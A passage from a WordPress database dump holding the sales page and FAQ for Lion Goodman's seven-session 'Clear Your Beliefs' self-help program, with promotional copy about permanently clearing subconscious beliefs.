we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 12:20:03', '2014-12-12 17:20:03', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2024, 2, '2014-12-12 13:02:13', '2014-12-12 18:02:13', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, 